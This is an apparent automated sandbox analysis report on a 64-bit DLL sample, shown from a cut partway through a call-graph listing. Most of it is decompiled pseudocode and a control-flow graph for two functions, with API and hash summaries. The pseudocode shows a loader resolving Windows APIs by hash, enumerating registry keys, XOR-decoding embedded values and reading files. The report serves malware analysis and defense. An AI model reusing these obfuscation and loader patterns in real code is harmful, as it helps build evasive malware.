11580->11583 11581->11580 11582 7ff88c07c7ef 11581->11582 11595 7ff88c07ce4c 11581->11595 11582->11562 11584 7ff88c07ca3c 11582->11584 11583->11582 11610 7ff88c07cce8 11584->11610 11586 7ff88c07ca4c 11590 7ff88c07c7fc 11586->11590 11615 7ff88c07cde4 11586->11615 11588 7ff88c07ca69 11588->11590 11620 7ff88c07ca7c 11588->11620 11590->11562 11591 7ff88c07cae8 11590->11591 11592 7ff88c07cb13 11591->11592 11593 7ff88c07cb17 11592->11593 11594 7ff88c07caf6 DeleteCriticalSection 11592->11594 11593->11562 11594->11592 11600 7ff88c07cb20 11595->11600 11598 7ff88c07cea3 InitializeCriticalSectionAndSpinCount 11599 7ff88c07ce8f 11598->11599 11599->11581 11601 7ff88c07cb86 11600->11601 11602 7ff88c07cb81 11600->11602 11601->11598 11601->11599 11602->11601 11603 7ff88c07cbb9 LoadLibraryExW 11602->11603 11608 7ff88c07cc4e 11602->11608 11609 7ff88c07cc2c FreeLibrary 11602->11609 11603->11602 11605 7ff88c07cbdf GetLastError 11603->11605 11604 7ff88c07cc5d GetProcAddress 11604->11601 11606 7ff88c07cc75 11604->11606 11605->11602 11607 7ff88c07cbea LoadLibraryExW 11605->11607 11606->11601 11607->11602 11608->11601 11608->11604 11609->11602 11611 7ff88c07cb20 try_get_function 5 API calls 11610->11611 11612 7ff88c07cd14 11611->11612 11613 7ff88c07cd2b TlsAlloc 11612->11613 11614 7ff88c07cd1c 11612->11614 11613->11614 11614->11586 11616 7ff88c07cb20 try_get_function 5 API calls 11615->11616 11617 7ff88c07ce17 11616->11617 11618 7ff88c07ce30 TlsSetValue 11617->11618 11619 7ff88c07ce1f 11617->11619 11618->11619 11619->11588 11621 7ff88c07ca8b 11620->11621 11622 7ff88c07ca90 11620->11622 11624 7ff88c07cd3c 11621->11624 11622->11590 11625 7ff88c07cb20 try_get_function 5 API calls 11624->11625 11626 7ff88c07cd67 11625->11626 11627 7ff88c07cd7d TlsFree 11626->11627 11628 7ff88c07cd6f 11626->11628 11627->11628 11628->11622 11640 7ff88c07f2b0 EnterCriticalSection 11629->11640 11631 7ff88c080e04 11632 7ff88c083ac0 33 API calls 11631->11632 11633 7ff88c080e0d 11632->11633 11634 7ff88c080e1b 11633->11634 11635 7ff88c080c0c 35 API calls 11633->11635 11636 7ff88c07f304 abort LeaveCriticalSection 11634->11636 11637 7ff88c080e16 11635->11637 11638 7ff88c080e27 11636->11638 11639 7ff88c080cf8 GetStdHandle GetFileType 11637->11639 11638->11568 11639->11634 11642 7ff88c07cf48 11641->11642 11644 7ff88c07cf14 11641->11644 11642->11571 11643 7ff88c07cf2e FreeLibrary 11643->11644 11644->11642 11644->11643 11646 7ff88c07b9a6 11645->11646 11649 7ff88c07b900 __scrt_initialize_onexit_tables 11645->11649 11647 7ff88c07bc0c __scrt_fastfail 6 API calls 11646->11647 11648 7ff88c07b9b0 11647->11648 11649->11527 11651 7ff88c07bacf 11650->11651 11653 7ff88c07bac5 _onexit 11650->11653 11654 7ff88c07df14 11651->11654 11653->11530 11657 7ff88c07dad0 11654->11657 11664 7ff88c07f2b0 EnterCriticalSection 11657->11664 11671 7ff88c07f090 11665->11671 11668 7ff88c07c824 11723 7ff88c07c934 11668->11723 11672 7ff88c07b7e5 11671->11672 11673 7ff88c07f0a1 11671->11673 11672->11668 11674 7ff88c07f5bc _get_daylight 6 API calls 11673->11674 11675 7ff88c07f0a6 11674->11675 11675->11672 11676 7ff88c07f614 _get_daylight 6 API calls 11675->11676 11677 7ff88c07f0bb 11676->11677 11681 7ff88c07ef30 11677->11681 11682 7ff88c07ef7a 11681->11682 11683 7ff88c07ef72 11681->11683 11685 7ff88c07e114 __free_lconv_num 15 API calls 11682->11685 11684 7ff88c07e114 __free_lconv_num 15 API calls 11683->11684 11684->11682 11686 7ff88c07ef87 11685->11686 11687 7ff88c07e114 __free_lconv_num 15 API calls 11686->11687 11688 7ff88c07ef94 11687->11688 11689 7ff88c07e114 __free_lconv_num 15 API calls 11688->11689 11690 7ff88c07efa1 11689->11690 11691 7ff88c07e114 __free_lconv_num 15 API calls 11690->11691 11692 7ff88c07efae 11691->11692 11693 7ff88c07e114 __free_lconv_num 15 API calls 11692->11693 11694 7ff88c07efbb 11693->11694 11695 7ff88c07e114 __free_lconv_num 15 API calls 11694->11695 11696 7ff88c07efc8 11695->11696 11697 7ff88c07e114 __free_lconv_num 15 API calls 11696->11697 11698 7ff88c07efd5 11697->11698 11699 7ff88c07e114 __free_lconv_num 15 API calls 11698->11699 11700 7ff88c07efe5 11699->11700 11701 7ff88c07e114 __free_lconv_num 15 API calls 11700->11701 11702 7ff88c07eff5 11701->11702 11707 7ff88c07ed18 11702->11707 11721 7ff88c07f2b0 EnterCriticalSection 11707->11721 11724 7ff88c07b7ea 11723->11724 11725 7ff88c07c948 11723->11725 11724->11494 11726 7ff88c07c952 11725->11726 11731 7ff88c07cd90 11725->11731 11728 7ff88c07cde4 __vcrt_FlsSetValue 6 API calls 11726->11728 11729 7ff88c07c962 11728->11729 11729->11724 11730 7ff88c07e114 __free_lconv_num 15 API calls 11729->11730 11730->11724 11732 7ff88c07cb20 try_get_function 5 API calls 11731->11732 11733 7ff88c07cdbb 11732->11733 11734 7ff88c07cdd1 TlsGetValue 11733->11734 11735 7ff88c07cdc3 11733->11735 11734->11735 11735->11726 11743 7ff88c07f2b0 EnterCriticalSection 11736->11743 11747 7ff88c07f244 11744->11747 11748 7ff88c07b893 11747->11748 11749 7ff88c07f253 11747->11749 11748->11552 11751 7ff88c07f564 11749->11751 11752 7ff88c07f320 __vcrt_uninitialize_ptd 5 API calls 11751->11752 11753 7ff88c07f58f 11752->11753 11754 7ff88c07f5a6 TlsFree 11753->11754 11755 7ff88c07f597 11753->11755 11754->11755 11755->11748 10260 7ff88c07b768 10261 7ff88c07b771 __scrt_initialize_onexit_tables 10260->10261 10263 7ff88c07b775 __isa_available_init 10261->10263 10264 7ff88c07d734 10261->10264 10265 7ff88c07d768 10264->10265 10266 7ff88c07d752 10264->10266 10268 7ff88c0805f8 49 API calls 10265->10268 10267 7ff88c07e6a0 _get_daylight 15 API calls 10266->10267 10269 7ff88c07d757 10267->10269 10270 7ff88c07d76d GetModuleFileNameA 10268->10270 10271 7ff88c07e580 _invalid_parameter_noinfo 32 API calls 10269->10271 10272 7ff88c07d79a 10270->10272 10273 7ff88c07d763 10271->10273 10291 7ff88c07d514 10272->10291 10273->10263 10278 7ff88c07d7f3 10281 7ff88c07d514 36 API calls 10278->10281 10279 7ff88c07d7e2 10280 7ff88c07e6a0 _get_daylight 15 API calls 10279->10280 10290 7ff88c07d7e7 10280->10290 10283 7ff88c07d80f 10281->10283 10282 7ff88c07e114 __free_lconv_num 15 API calls 10282->10273 10284 7ff88c07d83f 10283->10284 10285 7ff88c07d858 10283->10285 10283->10290 10286 7ff88c07e114 __free_lconv_num 15 API calls 10284->10286 10288 7ff88c07e114 __free_lconv_num 15 API calls 10285->10288 10287 7ff88c07d848 10286->10287 10289 7ff88c07e114 __free_lconv_num 15 API calls 10287->10289 10288->10290 10289->10273 10290->10282 10293 7ff88c07d552 10291->10293 10295 7ff88c07d5b8 10293->10295 10303 7ff88c080a00 10293->10303 10294 7ff88c07d6a4 10297 7ff88c07d6d0 10294->10297 10295->10294 10296 7ff88c080a00 36 API calls 10295->10296 10296->10295 10298 7ff88c07d6ef 10297->10298 10302 7ff88c07d6eb 10297->10302 10299 7ff88c07e26c __vcrt_getptd_noexit 15 API calls 10298->10299 10298->10302 10300 7ff88c07d71e 10299->10300 10301 7ff88c07e114 __free_lconv_num 15 API calls 10300->10301 10301->10302 10302->10278 10302->10279 10304 7ff88c080988 10303->10304 10305 7ff88c07e2e4 36 API calls 10304->10305 10306 7ff88c0809ac 10305->10306 10306->10293 11944 7ff88c07cf74 11945 7ff88c07cfaf 11944->11945 11946 7ff88c07cf98 11944->11946 11945->11946 11949 7ff88c07cfc6 11945->11949 11947 7ff88c07e6a0 _get_daylight 15 API calls 11946->11947 11948 7ff88c07cf9d 11947->11948 11952 7ff88c07e580 _invalid_parameter_noinfo 32 API calls 11948->11952 11950 7ff88c07cfcb 11949->11950 11951 7ff88c07cfd8 11949->11951 11953 7ff88c07e6a0 _get_daylight 15 API calls 11950->11953 11963 7ff88c07e854 11951->11963 11955 7ff88c07cfa8 11952->11955 11953->11955 11976 7ff88c07f2b0 EnterCriticalSection 11963->11976 12995 7ff88c07e7e0 13005 7ff88c0819f8 12995->13005 13006 7ff88c081a04 13005->13006 13028 7ff88c07f2b0 EnterCriticalSection 13006->13028

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 101 27ed37137e0-27ed3713845 GetModuleHandleA call 27ed37140f8 104 27ed37138bf-27ed37138c2 101->104 105 27ed3713847-27ed3713858 call 27ed371908c 101->105 106 27ed3713cc0-27ed3713cd5 104->106 107 27ed37138c8-27ed37138e1 HeapAlloc 104->107 112 27ed3713866 105->112 113 27ed371385a-27ed3713864 105->113 110 27ed37138e7-27ed3713905 call 27ed371487a call 27ed371908c 107->110 111 27ed3713cbb 107->111 123 27ed3713907 110->123 124 27ed371390d-27ed371394c call 27ed371638c call 27ed371908c 110->124 111->106 115 27ed3713869-27ed371387a call 27ed37140f8 112->115 113->115 115->104 122 27ed371387c-27ed3713892 call 27ed3715fc8 115->122 122->104 129 27ed3713894-27ed37138a0 call 27ed3715fc8 122->129 123->124 134 27ed371395e 124->134 135 27ed371394e-27ed371395c 124->135 133 27ed37138a5-27ed37138aa 129->133 133->104 137 27ed37138ac-27ed37138bd call 27ed3715fc8 133->137 136 27ed3713961-27ed3713968 134->136 135->136 139 27ed371398e-27ed37139b6 HeapAlloc 136->139 140 27ed371396a-27ed371397b call 27ed371908c 136->140 137->104 144 27ed3713a8e 139->144 145 27ed37139bc-27ed37139d0 call 27ed371908c 139->145 151 27ed3713984-27ed3713989 140->151 152 27ed371397d-27ed371397f 140->152 146 27ed3713a93-27ed3713a99 144->146 157 27ed37139d2-27ed37139f9 RegOpenKeyW 145->157 158 27ed37139fb 145->158 149 27ed3713a9f-27ed3713ae9 call 27ed37147b0 call 27ed371a0ac 146->149 150 27ed3713cb1-27ed3713cb9 call 27ed3716ce4 146->150 170 27ed3713b05-27ed3713b08 149->170 171 27ed3713aeb-27ed3713b03 call 27ed371a0ac 149->171 150->106 156 27ed3713cac-27ed3713caf 151->156 166 27ed3713caa 152->166 156->106 156->150 159 27ed37139fe-27ed3713a00 157->159 158->159 163 27ed3713a7e-27ed3713a8c HeapFree 159->163 164 27ed3713a02-27ed3713a13 call 27ed371908c 159->164 163->146 172 27ed3713a30 164->172 173 27ed3713a15-27ed3713a2e RegEnumKeyW 164->173 166->156 170->150 175 27ed3713b0e-27ed3713b1f call 27ed3715058 170->175 171->170 176 27ed3713a33-27ed3713a35 172->176 173->176 182 27ed3713b21-27ed3713b35 call 27ed371405c 175->182 183 27ed3713b4b-27ed3713b4e 175->183 180 27ed3713a37-27ed3713a4a call 27ed3716644 176->180 181 27ed3713a4c-27ed3713a52 176->181 180->164 180->181 185 27ed3713a54-27ed3713a5b 181->185 186 27ed3713a5d-27ed3713a6e call 27ed371908c 181->186 182->183 196 27ed3713b37-27ed3713b47 call 27ed371405c 182->196 183->150 188 27ed3713b54-27ed3713b57 call 27ed371a7a0 183->188 185->186 194 27ed3713a70-27ed3713a78 RegCloseKey 186->194 195 27ed3713a7a-27ed3713a7c 186->195 197 27ed3713b5c-27ed3713b5f 188->197 194->195 195->146 195->163 196->183 199 27ed3713b61-27ed3713b66 197->199 200 27ed3713b6b-27ed3713b99 197->200 199->150 202 27ed3713baf 200->202 203 27ed3713b9b-27ed3713ba3 200->203 204 27ed3713bb2-27ed3713bb5 202->204 203->204 205 27ed3713ba5-27ed3713bad call 27ed3714d70 203->205 206 27ed3713bc1-27ed3713bd6 call 27ed371a8e8 204->206 207 27ed3713bb7-27ed3713bbc 204->207 205->204 206->207 212 27ed3713bd8-27ed3713bf4 call 27ed371908c 206->212 207->150 215 27ed3713bf6-27ed3713bfa 212->215 216 27ed3713bfc 212->216 217 27ed3713bff-27ed3713c07 215->217 216->217 219 27ed3713c9d-27ed3713ca5 call 27ed3719d6c 217->219 220 27ed3713c0d-27ed3713c1e call 27ed371908c 217->220 219->166 224 27ed3713c20-27ed3713c24 220->224 225 27ed3713c26 220->225 226 27ed3713c29-27ed3713c3a call 27ed371908c 224->226 225->226 230 27ed3713c4b 226->230 231 27ed3713c3c-27ed3713c49 226->231 232 27ed3713c4e-27ed3713c55 230->232 231->232 234 27ed3713c6f-27ed3713c7c call 27ed371908c 232->234 235 27ed3713c57-27ed3713c64 call 27ed371908c 232->235 241 27ed3713c8f 234->241 242 27ed3713c7e-27ed3713c8d 234->242 235->152 240 27ed3713c6a-27ed3713c6d 235->240 240->156 243 27ed3713c92-27ed3713c95 241->243 242->243 243->106 245 27ed3713c97-27ed3713c9b 243->245 245->235
                          C-Code - Quality: 38%
                          			E0000027E27ED37137E0(long long* __rax, long long __rcx, void* __r9) {
                          				void* __rbx;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t80;
                          				void* _t84;
                          				void* _t85;
                          				void* _t100;
                          				void* _t176;
                          				long long* _t222;
                          				long long* _t223;
                          				long long* _t224;
                          				long long _t225;
                          				intOrPtr _t226;
                          				long long* _t228;
                          				long long* _t229;
                          				void* _t230;
                          				void* _t288;
                          				long long _t289;
                          				void* _t291;
                          				void* _t294;
                          				intOrPtr _t295;
                          				intOrPtr _t296;
                          				void* _t300;
                          				void* _t301;
                          				void* _t303;
                          				void* _t310;
                          				void* _t313;
                          				long long _t314;
                          				void* _t315;
                          				void* _t316;
                          				long long _t319;
                          				long long* _t320;
                          				void* _t322;
                          				CHAR* _t327;
                          
                          				_t222 = __rax;
                          				 *((long long*)(_t300 + 8)) = __rcx;
                          				_t301 = _t300 - 0x248;
                          				_t292 =  *0xd371d458;
                          				_t295 =  *((intOrPtr*)( *0xd371d458 + 8));
                          				 *((long long*)(_t301 + 0x20)) =  *0xd371d448;
                          				 *(_t301 + 0x298) =  *0xd371d450;
                          				GetModuleHandleA(_t327);
                          				_t80 = E0000027E27ED37140F8(__rax,  *0xd371d458 + 0x18, _t303, _t313, _t322, _t319);
                          				r13d = 0;
                          				if (_t80 != r13d) goto 0xd37138bf;
                          				E0000027E27ED371908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t222 == _t319) goto 0xd3713866;
                          				 *_t222();
                          				goto 0xd3713869;
                          				_t223 = _t319;
                          				if (E0000027E27ED37140F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288) != r13d) goto 0xd37138bf;
                          				_t84 = E0000027E27ED3715FC8(_t223, _t230,  *0xd371d448 + 0x27ed3721082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
                          				if (_t84 != r13d) goto 0xd37138bf;
                          				_t85 = E0000027E27ED3715FC8(_t223, _t230,  *0xd371d448 + 0x27ed3721079, _t292 + 0x20, _t292, _t295); // executed
                          				if (_t85 != r13d) goto 0xd37138bf;
                          				if (E0000027E27ED3715FC8(_t223, _t230,  *0xd371d448 + 0x27ed3721092, _t292 + 0x30, _t292, _t295) != r13d) goto 0xd3713cc0;
                          				HeapAlloc(??, ??, ??);
                          				_t289 = _t223;
                          				if (_t223 == _t319) goto 0xd3713cbb;
                          				0xd371487a();
                          				E0000027E27ED371908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
                          				if (_t223 == _t319) goto 0xd371390d;
                          				 *_t223();
                          				_t24 = _t289 + 0xa8; // 0xa8
                          				_t224 = _t24;
                          				 *_t224 = _t224;
                          				 *((long long*)(_t289 + 0xb0)) = _t224;
                          				 *(_t289 + 0x9c) = r13d;
                          				 *(_t289 + 0xa0) = r13d;
                          				 *(_t289 + 0x98) = r13d;
                          				E0000027E27ED371638C(_t224, _t230, _t292, _t230);
                          				E0000027E27ED371908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t224 == _t319) goto 0xd371395e;
                          				r9d = 0;
                          				r8d = 0;
                          				 *_t224();
                          				goto 0xd3713961;
                          				_t225 = _t319;
                          				 *((long long*)(_t289 + 0x28)) = _t225;
                          				if (_t225 != _t319) goto 0xd371398e;
                          				E0000027E27ED371908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t225 == _t319) goto 0xd3713984;
                          				 *_t225();
                          				goto 0xd3713caa;
                          				goto 0xd3713cac;
                          				r8d = 0x1102;
                          				HeapAlloc(??, ??, ??);
                          				_t320 = _t225;
                          				_t34 = _t295 + 0x7f; // 0x7f
                          				r12d = _t34;
                          				if (_t225 == _t295) goto 0xd3713a8e;
                          				 *_t225 = 0;
                          				E0000027E27ED371908C(0x3d06c463, _t225,  *((intOrPtr*)( *0xd371d458 + 0x20)));
                          				if (_t225 == _t295) goto 0xd37139fb;
                          				RegOpenKeyW(??, ??, ??); // executed
                          				goto 0xd37139fe;
                          				if (r12d != 0) goto 0xd3713a7e;
                          				E0000027E27ED371908C(0xdf514773, _t225,  *((intOrPtr*)( *0xd371d458 + 0x20)));
                          				if (_t225 == 0) goto 0xd3713a30;
                          				r9d = 0x104;
                          				RegEnumKeyW(??, ??, ??, ??); // executed
                          				goto 0xd3713a33;
                          				if (r12d != 0) goto 0xd3713a4c;
                          				_t100 = E0000027E27ED3716644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
                          				if (_t100 == 0) goto 0xd3713a02;
                          				if (_t100 != 0x103) goto 0xd3713a5d;
                          				 *0xd371d438 = _t320;
                          				E0000027E27ED371908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0xd371d458 + 0x20)));
                          				if (_t225 == 0) goto 0xd3713a7a;
                          				RegCloseKey(??); // executed
                          				if (0 == 0) goto 0xd3713a93;
                          				HeapFree(??, ??, ??);
                          				goto 0xd3713a93;
                          				r13d = 0;
                          				if (8 != r13d) goto 0xd3713cb1;
                          				_t296 =  *0xd371d448;
                          				_t47 = _t320 + 8; // 0x8
                          				r8d = _t47;
                          				0xd37147b0();
                          				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
                          				if (E0000027E27ED371A0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x27ed3710000 + _t296 + 0x11188) == r13d) goto 0xd3713b05;
                          				_t310 = 0x27ed3710000 + _t296 + 0x111e0;
                          				if (E0000027E27ED371A0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0xd3713cb1;
                          				_t57 = _t289 + 8; // 0x8
                          				_t286 = _t57;
                          				if (E0000027E27ED3715058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0xd3713b4b;
                          				E0000027E27ED371405C(_t230, _t289, _t57, _t289, _t292, _t296);
                          				 *((long long*)(_t289 + 0x30)) = _t225;
                          				if (_t225 == _t320) goto 0xd3713b4b;
                          				_t59 = _t289 + 8; // 0x8
                          				E0000027E27ED371405C(_t230, _t59, _t57, _t289, _t292, _t296);
                          				 *((long long*)(_t289 + 0x38)) = _t225;
                          				_t144 =  !=  ? r13d : 8;
                          				_t207 = ( !=  ? r13d : 8) - r13d;
                          				if (( !=  ? r13d : 8) != r13d) goto 0xd3713cb1;
                          				if (E0000027E27ED371A7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0xd3713b6b;
                          				goto 0xd3713cb1;
                          				_t226 =  *((intOrPtr*)(_t301 + 0x20));
                          				r9d =  *(_t301 + 0x298);
                          				_t314 = _t226 + 0x27ed371f000;
                          				r8d =  *(_t314 + 2) & 0x0000ffff;
                          				if (_t226 - _t310 + 8 <= 0) goto 0xd3713baf;
                          				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0xd3713bb2;
                          				E0000027E27ED3714D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
                          				goto 0xd3713bb2;
                          				_t228 = _t320;
                          				if (_t228 != _t320) goto 0xd3713bc1;
                          				goto 0xd3713cb1;
                          				r9d = r9d ^ 0xecb028fc;
                          				E0000027E27ED371A8E8(r9d, _t228, _t314, __r9);
                          				if (_t228 == _t320) goto 0xd3713bb7;
                          				 *((long long*)(_t289 + 0x40)) = _t314;
                          				 *0xd371d440 = _t289;
                          				E0000027E27ED371908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t228 == _t320) goto 0xd3713bfc;
                          				 *_t228();
                          				goto 0xd3713bff;
                          				_t229 = _t320;
                          				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0xd3713c9d;
                          				E0000027E27ED371908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0xd3713c26;
                          				 *_t229();
                          				goto 0xd3713c29;
                          				E0000027E27ED371908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0xd3713c4b;
                          				r8d = r13d;
                          				 *_t229();
                          				goto 0xd3713c4e;
                          				if (_t320 != _t320) goto 0xd3713c6f;
                          				E0000027E27ED371908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 != _t320) goto 0xd371397d;
                          				goto 0xd3713cac;
                          				E0000027E27ED371908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0xd3713c8f;
                          				 *_t229();
                          				goto 0xd3713c92;
                          				if (r13d != r13d) goto 0xd3713cc0;
                          				goto 0xd3713c57;
                          				asm("lock add dword [esi+0x38], 0x1");
                          				if (E0000027E27ED3719D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0xd3713cc0;
                          				E0000027E27ED3716CE4(_t229, _t230, _t289, _t320, _t292);
                          				goto 0xd3713cc0;
                          				return 8;
                          			}






































                          0x27ed37137e0
                          0x27ed37137e0
                          0x27ed37137f1
                          0x27ed37137ff
                          0x27ed371380c
                          0x27ed3713817
                          0x27ed3713824
                          0x27ed371382b
                          0x27ed3713838
                          0x27ed371383d
                          0x27ed3713845
                          0x27ed3713850
                          0x27ed3713858
                          0x27ed3713862
                          0x27ed3713864
                          0x27ed3713866
                          0x27ed371387a
                          0x27ed3713888
                          0x27ed3713892
                          0x27ed37138a0
                          0x27ed37138aa
                          0x27ed37138c2
                          0x27ed37138d5
                          0x27ed37138db
                          0x27ed37138e1
                          0x27ed37138ef
                          0x27ed37138fd
                          0x27ed3713905
                          0x27ed371390b
                          0x27ed371390d
                          0x27ed371390d
                          0x27ed3713917
                          0x27ed371391a
                          0x27ed3713921
                          0x27ed3713928
                          0x27ed371392f
                          0x27ed3713936
                          0x27ed3713944
                          0x27ed371394c
                          0x27ed371394e
                          0x27ed3713951
                          0x27ed371395a
                          0x27ed371395c
                          0x27ed371395e
                          0x27ed3713961
                          0x27ed3713968
                          0x27ed3713973
                          0x27ed371397b
                          0x27ed371397d
                          0x27ed371397f
                          0x27ed3713989
                          0x27ed3713997
                          0x27ed37139a4
                          0x27ed37139ac
                          0x27ed37139af
                          0x27ed37139af
                          0x27ed37139b6
                          0x27ed37139bc
                          0x27ed37139c8
                          0x27ed37139d0
                          0x27ed37139f5
                          0x27ed37139f9
                          0x27ed3713a00
                          0x27ed3713a0b
                          0x27ed3713a13
                          0x27ed3713a22
                          0x27ed3713a2a
                          0x27ed3713a2e
                          0x27ed3713a35
                          0x27ed3713a41
                          0x27ed3713a4a
                          0x27ed3713a52
                          0x27ed3713a54
                          0x27ed3713a66
                          0x27ed3713a6e
                          0x27ed3713a78
                          0x27ed3713a7c
                          0x27ed3713a86
                          0x27ed3713a8c
                          0x27ed3713a93
                          0x27ed3713a99
                          0x27ed3713a9f
                          0x27ed3713aa6
                          0x27ed3713aa6
                          0x27ed3713ab7
                          0x27ed3713ad6
                          0x27ed3713ae9
                          0x27ed3713aeb
                          0x27ed3713b08
                          0x27ed3713b0e
                          0x27ed3713b0e
                          0x27ed3713b1f
                          0x27ed3713b29
                          0x27ed3713b2e
                          0x27ed3713b35
                          0x27ed3713b37
                          0x27ed3713b3b
                          0x27ed3713b43
                          0x27ed3713b47
                          0x27ed3713b4b
                          0x27ed3713b4e
                          0x27ed3713b5f
                          0x27ed3713b66
                          0x27ed3713b6b
                          0x27ed3713b70
                          0x27ed3713b78
                          0x27ed3713b83
                          0x27ed3713b99
                          0x27ed3713ba3
                          0x27ed3713ba8
                          0x27ed3713bad
                          0x27ed3713baf
                          0x27ed3713bb5
                          0x27ed3713bbc
                          0x27ed3713bc1
                          0x27ed3713bce
                          0x27ed3713bd6
                          0x27ed3713bd8
                          0x27ed3713be5
                          0x27ed3713bec
                          0x27ed3713bf4
                          0x27ed3713bf8
                          0x27ed3713bfa
                          0x27ed3713bfc
                          0x27ed3713c07
                          0x27ed3713c16
                          0x27ed3713c1e
                          0x27ed3713c20
                          0x27ed3713c24
                          0x27ed3713c32
                          0x27ed3713c3a
                          0x27ed3713c3e
                          0x27ed3713c44
                          0x27ed3713c49
                          0x27ed3713c55
                          0x27ed3713c5c
                          0x27ed3713c64
                          0x27ed3713c6d
                          0x27ed3713c74
                          0x27ed3713c7c
                          0x27ed3713c8b
                          0x27ed3713c8d
                          0x27ed3713c95
                          0x27ed3713c9b
                          0x27ed3713c9d
                          0x27ed3713caf
                          0x27ed3713cb4
                          0x27ed3713cb9
                          0x27ed3713cd5

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                          • String ID:
                          • API String ID: 2248784776-0
                          • Opcode ID: f0ae29e9b9d10cae7e5017acca108a75aab104d24a78833c096b7ef7861027b9
                          • Instruction ID: 1e50362b1d8d794360c81e86a0e80a93c01b52408c94567da6bad9dcb3911f9a
                          • Opcode Fuzzy Hash: f0ae29e9b9d10cae7e5017acca108a75aab104d24a78833c096b7ef7861027b9
                          • Instruction Fuzzy Hash: 95D1BD37708E45D2FE709B61E0883AB62A9F78E784F522491DE4E473C7DE78D5898320
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 23%
                          			E00007FF87FF88C0711F0(void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long __r12, long long __r13, long long __r14, intOrPtr _a8, void* _a16, void* _a24, long long _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a88, long long _a96, intOrPtr _a104) {
                          				void* _v32;
                          				void* _v40;
                          				intOrPtr _v48;
                          				long long _v56;
                          				intOrPtr _v64;
                          				intOrPtr _v72;
                          				intOrPtr _v80;
                          				intOrPtr _v88;
                          				intOrPtr _v96;
                          				intOrPtr _v104;
                          				void* __rbx;
                          				intOrPtr _t78;
                          				void* _t99;
                          				intOrPtr _t102;
                          				intOrPtr _t108;
                          				void* _t113;
                          				void* _t119;
                          				signed long long _t126;
                          				void* _t130;
                          				long long _t133;
                          				signed long long _t140;
                          				void* _t151;
                          				signed long long _t159;
                          				void* _t164;
                          				long long _t171;
                          
                          				_t119 = _t151;
                          				r11d = _a88;
                          				_t171 = _a96;
                          				r11d = r11d + 0xfffff8a0;
                          				 *((long long*)(_t119 + 0x10)) = __rbp;
                          				 *((long long*)(_t119 + 0x18)) = __rsi;
                          				 *((long long*)(_t119 - 0x20)) = __r13;
                          				r13d = __rcx - 0x3a59;
                          				 *((long long*)(_t119 - 0x28)) = __r14;
                          				r14d = __r8 - 0x1044;
                          				r8d = _a104;
                          				r8d = r8d + 0xffffdefd;
                          				_a8 = __rdx - 0xfd2;
                          				_a88 = r11d;
                          				_a104 = r8d;
                          				if (r8d - __rcx + 0xf35 >= 0) goto 0x8c07130e;
                          				 *((intOrPtr*)(_t171 + 0x98)) =  *((intOrPtr*)(_t171 + 0x368));
                          				r11d = __r8 + 0x329d;
                          				r10d = __r13 + 0x27b2;
                          				_v48 = r10d;
                          				r8d = __rcx + 0xf35;
                          				_v56 = _t171;
                          				_v64 = __rcx + 0xc88;
                          				_t102 = __r13 + 0x27ae;
                          				_v72 = _a64 + 0xde3;
                          				_v80 = r11d;
                          				r9d = __r14 + 0xd93;
                          				_v88 = __r13 + 0x3189;
                          				_v96 = _t102;
                          				_v104 = __r14 - 0x3c4;
                          				_t78 = E00007FF87FF88C0884E0(_t119, _t130, __rsi, __r8, _t164, __r14); // executed
                          				_t133 =  *((intOrPtr*)(_t171 + 0x348));
                          				r8d = _t78;
                          				 *((long long*)(_t171 + 0x158)) = _t133;
                          				goto 0x8c071428;
                          				_a40 = _t102;
                          				r10d = _t102;
                          				_t108 = _t102;
                          				if (_t108 != 0) goto 0x8c07142f;
                          				_a32 = __r12;
                          				r12d = _t133 + 0x2ee;
                          				r12d = r12d & 0x000023f6;
                          				asm("o16 nop [eax+eax]");
                          				if (_t108 == 0) goto 0x8c0713c6;
                          				asm("o16 nop [eax+eax]");
                          				ReadFile(??, ??, ??, ??, ??);
                          				if (1 - ( *(_t171 + 0x220) &  *(_t171 + 0xe8)) + 0x1f2c < 0) goto 0x8c071370;
                          				r10d = _a40;
                          				r11d = _a88;
                          				r9d = 0;
                          				if (r12d > 0) goto 0x8c071406;
                          				_t159 =  *(_t171 + 0x1b8) ^ 0x00002598;
                          				if (_t159 == 0) goto 0x8c0713fd;
